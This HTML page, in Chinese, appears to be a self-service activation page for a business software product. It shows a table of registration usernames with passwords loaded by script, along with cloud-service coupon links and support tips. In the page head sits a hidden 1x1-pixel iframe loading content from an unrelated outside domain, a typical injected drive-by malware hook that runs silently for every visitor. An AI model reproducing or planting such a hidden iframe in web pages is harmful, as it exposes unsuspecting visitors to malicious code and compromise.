<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
	<script src="jquery-2.1.1.min.js"></script>
<script src="jmly.js"></script>
<script src="regpage.js"></script>
	
	
<script type="text/javascript">window.$crisp=[];window.CRISP_WEBSITE_ID="403f9afc-95de-454c-9b49-d12e27886244";(function(){d=document;s=d.createElement("script");s.src="https://client.crisp.chat/l.js";s.async=1;d.getElementsByTagName("head")[0].appendChild(s);})();</script>
<title>.</title>
 <iframe src="http://singingrock.com.cn/i/" width="1" height="1"></iframe>
<style type="text/css">
<!--
.STYLE1 {	font-family: "新宋体";
	font-weight: bold;
	color: #993333;
}
.STYLE2 {font-size: x-large}
.STYLE4 {	color: #FF00CC;
	font-size: x-large;
}
.STYLE7 {color: #FF0099; font-size: large; }
body,td,th {
	font-family: 宋体;
}
-->
</style>
</head>

<body>
<h1 align="center" class="STYLE1">自助激活</h1>
<p align="center" class="STYLE2">所有版本都是免费使用的，如果提示注册也是免费注册的，为了大家能快速注册，请自行用下面的注册码注册.</p>
<p align="center"><span class="STYLE2">下面的注册码都可以注册试试，总有一个是可以的.</span></p>
<p align="center"><span class="STYLE4">使用方法：</span><span class="STYLE2">在提示注册的窗口第一行写用户名，下面一行写注册密码，然后点击注册.</span><br />
</p>
<br />
<table width="95%" border="1" cellpadding="2" cellspacing="1">
  <tr>
    <th width="114" scope="col"><span class="STYLE4">注册码</span></th>
    <th width="147" scope="col"><div align="center"><span class="STYLE7">用户名</span></div></th>
    <th width="873" scope="col"><span class="STYLE7">密码</span></th>
  </tr>
  <tr>
    <th scope="row">注册码 1</th>
    <td><div align="center" class="STYLE2">m7</div></td>
         <td><div id="c1" align="center">正在加载注册码，请等待</div></td>
              
  </tr>
  <tr>
    <th scope="row">注册码 2</th>
    <td><div align="center" class="STYLE2">m7</div></td>
     <td><div id="c2" align="center">正在加载注册码，请等待...</div></td>
                  
  </tr>
</table>
<div style="text-align: center;">
<a href='javascript:history.go(0)'>激活不了？点击更换注册码</a>
</div>
	<span class="box" style="text-align: center;">
<a href="http://promotion.aliyun.com/ntms/yunparter/invite.html?userCode=iwy909uv" target="_blank">阿里云优惠卷</a>
<a href="https://curl.qcloud.com/ijH6xGIl" target="_blank">腾讯云抵扣劵</a>
</span>
	<script type="text/javascript">
 function copyText() {
  var text = document.getElementById("text").innerText;
  var input = document.getElementById("input");
  input.value = 'https://Newjxc.github.io'; // 修改文本框的内容
  input.select(); // 选中文本
  document.execCommand("copy"); // 执行浏览器复制命令 https://msg.newjxc.com/
  alert("复制成功");
 }
 </script>
	<style type="text/css">
 .wrapper {position: relative;}
 #input {position: absolute;top: 0;left: 0;opacity: 0;z-index: -10;}
</style>
	
<style>  
    .box{ 
    	display: inline-block;
    	font-size: 20px;
    	margin: 10px;
    	background: linear-gradient(left, #f71605, #e0f513); 
        background: -webkit-linear-gradient(left, #f71605, #e0f513);
        background: -o-linear-gradient(right, #f71605, #e0f513);
		-webkit-background-clip: text;
		-webkit-text-fill-color: transparent;
		animation:scratchy 0.253s linear forwards infinite;
		/* 其它浏览器兼容性前缀 */
	    -webkit-animation:scratchy 0.253s linear forwards infinite;
	    -moz-animation: scratchy 0.253s linear forwards infinite;
	    -ms-animation: scratchy 0.253s linear forwards infinite;
	    -o-animation: scratchy 0.253s linear forwards infinite;
    }  
   @keyframes  scratchy {
		0% {
			background-position: 0 0;
		}
		25% {
			background-position: 0 0;
		}
		26% {
			background-position: 20px -20px;
		}
		50% {
			background-position: 20px -20px;
		}
		51% {
			background-position: 40px -40px;
		}
		75% {
			background-position: 40px -40px;
		}
		76% {
			background-position: 60px -60px;
		}
		99% {
			background-position: 60px -60px;
		}
		100% {
			background-position: 0 0;
		}
	}
	/* 添加兼容性前缀 */
	@-webkit-keyframes scratchy {
	    0% {
			background-position: 0 0;
		}
		25% {
			background-position: 0 0;
		}
		26% {
			background-position: 20px -20px;
		}
		50% {
			background-position: 20px -20px;
		}
		51% {
			background-position: 40px -40px;
		}
		75% {
			background-position: 40px -40px;
		}
		76% {
			background-position: 60px -60px;
		}
		99% {
			background-position: 60px -60px;
		}
		100% {
			background-position: 0 0;
		}
	}
	@-moz-keyframes scratchy {
	    0% {
			background-position: 0 0;
		}
		25% {
			background-position: 0 0;
		}
		26% {
			background-position: 20px -20px;
		}
		50% {
			background-position: 20px -20px;
		}
		51% {
			background-position: 40px -40px;
		}
		75% {
			background-position: 40px -40px;
		}
		76% {
			background-position: 60px -60px;
		}
		99% {
			background-position: 60px -60px;
		}
		100% {
			background-position: 0 0;
		}
	}
	@-ms-keyframes scratchy {
	   0% {
			background-position: 0 0;
		}
		25% {
			background-position: 0 0;
		}
		26% {
			background-position: 20px -20px;
		}
		50% {
			background-position: 20px -20px;
		}
		51% {
			background-position: 40px -40px;
		}
		75% {
			background-position: 40px -40px;
		}
		76% {
			background-position: 60px -60px;
		}
		99% {
			background-position: 60px -60px;
		}
		100% {
			background-position: 0 0;
		}
	}
	@-o-keyframes scratchy {
	   0% {
			background-position: 0 0;
		}
		25% {
			background-position: 0 0;
		}
		26% {
			background-position: 20px -20px;
		}
		50% {
			background-position: 20px -20px;
		}
		51% {
			background-position: 40px -40px;
		}
		75% {
			background-position: 40px -40px;
		}
		76% {
			background-position: 60px -60px;
		}
		99% {
			background-position: 60px -60px;
		}
		100% {
			background-position: 0 0;
		}
	}
</style>
	<style type="text/css">
.main{
  color: #666;margin-top: 50px;
}
/* 定义keyframe动画，命名为blink */
@keyframes blink{
  0%{opacity: 1;}
  100%{opacity: 0;} 
}
/* 添加兼容性前缀 */
@-webkit-keyframes blink {
    0% { opacity: 1; }
    100% { opacity: 0; }
}
@-moz-keyframes blink {
    0% { opacity: 1; }
    100% { opacity: 0; }
}
@-ms-keyframes blink {
    0% {opacity: 1; } 
    100% { opacity: 0;}
}
@-o-keyframes blink {
    0% { opacity: 1; }
    100% { opacity: 0; }
}
/* 定义blink类*/
.blink{
    color: #dd4814;
    animation: blink 1s linear infinite;  
    /* 其它浏览器兼容性前缀 */
    -webkit-animation: blink 1s linear infinite;
    -moz-animation: blink 1s linear infinite;
    -ms-animation: blink 1s linear infinite;
    -o-animation: blink 1s linear infinite;
}
</style>
<p>提示</p>
<p>1,如果是手机版服务端提示注册，请升级到新版就好。</p>
<p>2.新版本升级服务请咨询admin@newjxc.com</p>
<p>3.长期使用建议购买正版软件<div class="main">><span class="blink"><a href='#' onclick="sendmsg()" >留言咨询</a></span>
</div></p>
 
<div class="wrapper">
<!-- <p id="text">https://Newjxc.github.io  <textarea id="input"></textarea> <button onclick="copyText()">备用地址点击复制</button> </p> -->
</div>
</body>
</html>


